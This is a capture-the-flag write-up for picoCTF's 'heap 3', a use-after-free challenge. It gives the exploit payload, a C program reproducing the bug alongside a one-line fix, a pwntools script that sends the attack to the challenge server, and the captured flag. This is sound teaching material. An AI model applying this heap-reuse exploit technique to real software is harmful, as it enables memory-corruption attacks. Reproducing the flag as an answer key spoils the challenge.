heap 3
Description
This program mishandles memory. Can you exploit it to get the flag?
Download the binary here.
Download the source here.
Initial analysis
The goal of this challenge is to make x->flag hold the string "pico", which the win check compares with strcmp:
if(!strcmp(x->flag, "pico")) {
...
The options available to us are as follows:
1. Print Heap
2. Allocate object
3. Print x->flag
4. Check for win
5. Free x
6. Exit
Payload
x is a global pointer to a heap-allocated object, and the flag we need to control is the last 5 bytes of that object. Option 5 frees the object but does not clear x, so the pointer is left dangling. If we then use option 2 to allocate an object of the same size, 35 bytes, the allocator hands back the chunk it just freed (glibc serves a request of the same size class from its tcache free list), and the data we write into the new allocation lands in the memory x still points to. A payload of 30 filler bytes followed by "pico" therefore sets x->flag to b"pico\0": we send 34 characters and the program's string read supplies the terminating NUL as the 35th byte.
This is a use-after-free: the object is released through x, reused by a new allocation we control, and then read again through the stale pointer by the win check. Option 1 (Print Heap) is useful for confirming, before sending option 4, that the write landed where expected.
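The following C program is an added example that reproduces the mechanism outside the challenge binary; it is not the challenge source or the author's code. It assumes a struct layout of three 10-byte fields followed by a 5-byte flag (35 bytes, flag at offset 30), which is consistent with the 30 filler bytes in the payload but is an assumption, as are the field names. The reuse of the freed chunk relies on glibc's tcache handing back the most recently freed chunk of the same size class in a single-threaded process. The fixed variant shows the one-line change (clearing the global after free) that turns the stale read into a NULL check.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed layout (not taken from the challenge source): three 10-byte
 * fields and a 5-byte flag, so sizeof(object) == 35 and flag is at
 * offset 30, matching the 30 filler bytes in the writeup's payload. */
typedef struct {
    char a[10];
    char b[10];
    char c[10];
    char flag[5];
} object;

static object *x;  /* global pointer to the object, as in the challenge */

/* Models menu option 2: malloc(size), then copy a user string into the
 * chunk with a terminating NUL, the way a scanf("%s") read would. */
static char *alloc_object(size_t size, const char *data) {
    char *p = malloc(size);
    if (p != NULL)
        snprintf(p, size, "%s", data);
    return p;
}

/* Models menu option 4: the check reads through x whether or not the
 * object it points to is still live. */
static int check_win(void) {
    return strcmp(x->flag, "pico") == 0;
}

/* Builds the writeup's payload into a 35-byte buffer: 30 filler bytes,
 * then "pico" and its NUL (34 characters plus the terminator). */
static void build_payload(char *out) {
    memset(out, 'A', 30);
    memcpy(out + 30, "pico", 5);
}

/* Vulnerable sequence: free x without clearing it (option 5), allocate a
 * 35-byte object (option 2), check (option 4).  Returns 1 when the
 * allocator handed the freed chunk straight back, so the payload landed in
 * the memory x still points to and the win check passes; 0 otherwise. */
int run_use_after_free(void) {
    x = malloc(sizeof *x);
    if (x == NULL) return 0;
    memset(x, 0, sizeof *x);
    memcpy(x->flag, "nope", 5);

    free(x);                        /* x is now dangling */

    char payload[sizeof(object)];
    build_payload(payload);
    char *p = alloc_object(sizeof(object), payload);
    if (p == NULL) return 0;

    int reused = (p == (char *)x);
    /* Only dereference x once we know its chunk is live again as p. */
    int won = reused && check_win();

    free(p);                        /* p owns the chunk; x is not freed again */
    x = NULL;
    return won;
}

/* Fixed sequence: the free clears the global, so the win check is guarded
 * by a NULL test instead of reading a stale pointer.  Returns 0. */
int run_fixed(void) {
    x = malloc(sizeof *x);
    if (x == NULL) return 0;
    memset(x, 0, sizeof *x);
    memcpy(x->flag, "nope", 5);

    free(x);
    x = NULL;                       /* the one-line fix */

    char payload[sizeof(object)];
    build_payload(payload);
    char *p = alloc_object(sizeof(object), payload);
    int won = (x != NULL) && check_win();
    free(p);
    return won;
}

int main(void) {
    printf("use-after-free wins: %d\n", run_use_after_free());
    printf("after fix wins:      %d\n", run_fixed());
    return 0;
}
```

Compile with a plain `cc` (no sanitizer) to see the reuse; building with AddressSanitizer instead reports the stale read in check_win, which is the quickest way to catch this bug class in a test suite.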
Script
#!/usr/bin/env python3
from pwn import *

r = remote("tethys.picoctf.net", 55153)

# Input is buffered, so every response can be queued before the prompts arrive.
r.sendline(b"5")                 # free x, leaving the global pointer dangling
r.sendline(b"2")                 # allocate a new object
r.sendline(b"35")                # same size as x, so the freed chunk is reused
r.sendline(b"A" * 30 + b"pico")  # 30 filler bytes, then the 5-byte flag field
r.sendline(b"4")                 # check for win: strcmp(x->flag, "pico")
r.interactive()
Running
Enter your choice: YOU WIN!!11!!
picoCTF{now_thats_free_real_estate_a7381726}
This post is licensed under CC BY 4.0 by the author.